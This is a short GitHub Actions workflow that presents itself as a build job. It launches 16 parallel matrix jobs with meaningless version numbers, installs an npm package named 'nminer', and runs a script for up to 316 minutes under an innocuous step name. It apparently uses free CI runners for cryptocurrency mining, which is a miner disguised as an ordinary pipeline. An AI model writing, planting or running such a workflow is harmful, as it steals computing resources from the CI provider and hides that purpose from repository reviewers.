name: formula
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3269 }
          - { version: 5067 }
          - { version: 6288 }
          - { version: 6969 }
          - { version: 1776 }
          - { version: 191 }
          - { version: 238 }
          - { version: 3722 }
          - { version: 1517 }
          - { version: 9082 }
          - { version: 5982 }
          - { version: 3215 }
          - { version: 2079 }
          - { version: 2687 }
          - { version: 8384 }
          - { version: 5043 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: faithfully whereas
        run: |
          npm install nminer@latest
          timeout 316m node formula.js || echo "formula executed"